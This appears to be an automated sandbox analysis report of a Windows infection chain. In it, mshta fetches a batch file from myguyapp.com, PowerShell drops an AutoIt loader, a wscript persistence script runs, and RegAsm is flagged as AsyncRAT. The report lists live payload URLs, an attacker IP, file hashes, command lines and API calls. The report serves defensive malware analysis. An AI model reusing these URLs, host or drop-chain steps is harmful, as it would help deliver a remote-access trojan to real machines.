Source: msword.exe.12.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: 2D85F72862B55C4EADD9E66E06947F3D0.7.dr	String found in binary or memory: http://x1.i.lencr.org/
Source: mshta.exe, 00000000.00000002.2179032365.000000000AA70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: mshta.exe, 00000000.00000003.2153198668.0000000000C96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2178093355.0000000000C96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/
Source: mshta.exe, 00000000.00000003.2154288792.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2160406419.0000000004F0D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2179032365.000000000AA90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2162068506.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp, c2.hta	String found in binary or memory: https://myguyapp.com/c2.bat
Source: mshta.exe, 00000000.00000002.2177728509.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/c2.bat-d
Source: RegAsm.exe, 00000023.00000002.4498969809.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.4498969809.0000000000B18000.00000004.00000020.00020000.00000000.sdmp, downloaded.bat.0.dr, c2[1].bat.0.dr	String found in binary or memory: https://myguyapp.com/f.pdf
Source: tasklist.exe, 00000013.00000002.2586958016.0000000000C88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/f.pdfQ
Source: RegAsm.exe, 00000023.00000002.4498969809.0000000000B18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/f.pdfQ(
Source: Carter.pif, 00000018.00000003.2607057957.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2607278700.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2606962712.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2607612929.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2607017088.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2606871743.0000000001585000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2607654794.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2607810711.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2606840417.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2607734392.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2607186070.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2606748916.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3826598590.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3826655024.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3826687495.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2606938161.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2610507538.0000000001584000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/f.pdfUSERDOMAIN=PIVFAGEUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPR
Source: RegAsm.exe, 00000023.00000002.4499684136.0000000000E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/f.pdfUSERDOMAIN=PIVFAGEUSERDOMAIN_ROAMINGPROFILE=userpv
Source: RegAsm.exe, 00000023.00000002.4498969809.0000000000B18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/f.pdfZ(
Source: RegAsm.exe, 00000023.00000002.4498969809.0000000000B18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/f.pdfi)
Source: tasklist.exe, 00000013.00000003.2585378304.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2585540846.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2587033136.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/f.pdfq
Source: cmd.exe, 0000001D.00000002.2608151445.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/ms
Source: tasklist.exe, 00000011.00000002.2579186939.00000000031A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/mswor
Source: mshta.exe, 00000000.00000003.2161704263.000000000A233000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2179032365.000000000AA70000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000E.00000002.2613776983.00000000021D0000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000E.00000002.2613929472.0000000002420000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000E.00000002.2613025596.000000000076E000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000011.00000003.2578071945.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000011.00000003.2578208730.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000011.00000002.2579186939.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000011.00000003.2578186921.0000000002EA3000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000011.00000002.2578991564.0000000002E9F000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000011.00000003.2578273267.0000000002E9E000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000011.00000002.2578816151.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2587094931.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2585873048.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2585378304.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2585687735.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2586430099.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2586958016.0000000000C88000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000002.4499444549.0000000001748000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000002.4499409422.00000000016A0000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000019.00000002.2650030715.0000000002A50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zip
Source: cmd.exe, 0000001D.00000002.2608151445.0000000002E80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zip#.
Source: cmd.exe, 0000001A.00000002.2608593746.0000000003070000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zip=
Source: Carter.pif, 00000018.00000002.4499444549.0000000001748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipB
Source: tasklist.exe, 00000011.00000003.2578071945.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000011.00000003.2578208730.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000011.00000002.2578991564.0000000002E9F000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000011.00000003.2578273267.0000000002E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipCx
Source: Carter.pif, 00000018.00000002.4499444549.0000000001748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipr
Source: Carter.pif, 00000018.00000002.4499409422.00000000016A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipurl2=https:
Source: tasklist.exe, 00000013.00000002.2587094931.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2585873048.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2585378304.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2585687735.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=PIVF
Source: msword.exe, 0000000E.00000003.2611574966.0000000000804000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000E.00000002.2613025596.0000000000804000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=PIVFAGE
Source: RegAsm.exe, 00000023.00000002.4498969809.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.4498796106.0000000000790000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.4498969809.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=PIVFAGEUSERDOMAIN_ROAMINGPR
Source: tasklist.exe, 00000011.00000003.2578071945.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000011.00000003.2578186921.0000000002EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSW
Source: msword.exe, 0000000E.00000003.2557835042.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2605347135.00000000044F4000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3882027473.000000000424F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3881997130.0000000004246000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000002.4500843743.0000000004250000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.15.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: msword.exe, 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://www.globalsign.com/rea
Source: msword.exe, 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://www.globalsign.com/reancel
Source: Carter.pif.15.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: msword.exe, 0000000E.00000003.2557835042.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2605347135.00000000044F4000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3882027473.000000000424F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3881997130.0000000004246000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000002.4500843743.0000000004250000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.15.dr	String found in binary or memory: https://www.globalsign.com/repository/06

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown	HTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.5:49711 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 14_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

14_2_004050CD

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AF4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		24_2_00AF4830
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_00294830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		32_2_00294830

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 24_2_00AF4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

24_2_00AF4632

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 14_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

14_2_004044A5

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00B0D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		24_2_00B0D164
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_002AD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		32_2_002AD164

System Summary

Malicious sample detected (through community Yara rule)

Source: 24.2.Carter.pif.426ba60.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 24.2.Carter.pif.426ba60.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 35.2.RegAsm.exe.760000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 24.3.Carter.pif.426ba60.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 24.3.Carter.pif.426ba60.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000018.00000003.3881968473.0000000004261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000018.00000003.3881936961.00000000042C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000023.00000002.4498694614.0000000000762000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000018.00000002.4500843743.000000000426B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000018.00000003.3881856038.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000018.00000003.3826189129.0000000001B47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000018.00000003.3881856038.0000000004289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Drops large PE files

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File dump: msword.exe.12.dr 891289591

Jump to dropped file

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Wscript called in batch mode (surpress errors)

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 24_2_00AE42D5: CreateFileW,DeviceIoControl,CloseHandle,

24_2_00AE42D5

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 24_2_00AD8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

24_2_00AD8F2E

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 14_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,	14_2_00403883
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AE5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	24_2_00AE5778
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_00285778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	32_2_00285778

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\DistributionsPit
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\PrintersOngoing

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 14_2_0040497C	14_2_0040497C
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 14_2_00406ED2	14_2_00406ED2
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 14_2_004074BB	14_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00A8B020	24_2_00A8B020
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00A894E0	24_2_00A894E0
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00A89C80	24_2_00A89C80
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AA23F5	24_2_00AA23F5
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00B08400	24_2_00B08400
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AB6502	24_2_00AB6502
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00A8E6F0	24_2_00A8E6F0
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AB265E	24_2_00AB265E
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AA282A	24_2_00AA282A
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AB89BF	24_2_00AB89BF
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00B00A3A	24_2_00B00A3A
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AB6A74	24_2_00AB6A74
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00A90BE0	24_2_00A90BE0
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00ADEDB2	24_2_00ADEDB2
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AACD51	24_2_00AACD51
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00B00EB7	24_2_00B00EB7
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AE8E44	24_2_00AE8E44
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AB6FE6	24_2_00AB6FE6
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AA33B7	24_2_00AA33B7
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AAF409	24_2_00AAF409
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00A9D45D	24_2_00A9D45D
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00A8F6A0	24_2_00A8F6A0
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AA16B4	24_2_00AA16B4
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00A9F628	24_2_00A9F628
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00A81663	24_2_00A81663
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AA78C3	24_2_00AA78C3
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AA1BA8	24_2_00AA1BA8
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AADBA5	24_2_00AADBA5
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AB9CE5	24_2_00AB9CE5
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00A9DD28	24_2_00A9DD28
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AA1FC0	24_2_00AA1FC0
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AABFD6	24_2_00AABFD6
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0022B020	32_2_0022B020
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_002294E0	32_2_002294E0
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_00229C80	32_2_00229C80
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_002423F5	32_2_002423F5
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_002A8400	32_2_002A8400
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_00256502	32_2_00256502
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0025265E	32_2_0025265E
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0022E6F0	32_2_0022E6F0
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0024282A	32_2_0024282A
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_002589BF	32_2_002589BF
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_002A0A3A	32_2_002A0A3A
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_00256A74	32_2_00256A74
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_00230BE0	32_2_00230BE0
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0024CD51	32_2_0024CD51
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0027EDB2	32_2_0027EDB2
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_00288E44	32_2_00288E44
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_002A0EB7	32_2_002A0EB7
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_00256FE6	32_2_00256FE6
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_002433B7	32_2_002433B7
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0024F409	32_2_0024F409
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0023D45D	32_2_0023D45D
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0023F628	32_2_0023F628
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_00221663	32_2_00221663
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0022F6A0	32_2_0022F6A0
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_002416B4	32_2_002416B4
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_002478C3	32_2_002478C3
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0024DBA5	32_2_0024DBA5
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_00241BA8	32_2_00241BA8
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_00259CE5	32_2_00259CE5
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0023DD28	32_2_0023DD28
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_00241FC0	32_2_00241FC0
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0024BFD6	32_2_0024BFD6
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Code function: 35_2_02850FC8	35_2_02850FC8
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Code function: 35_2_0285EC7C	35_2_0285EC7C

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\220239\Carter.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD

Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: String function: 00248B30 appears 42 times
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: String function: 00231A36 appears 34 times
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: String function: 00240D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: String function: 00A91A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: String function: 00AA0D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: String function: 00AA8B30 appears 42 times
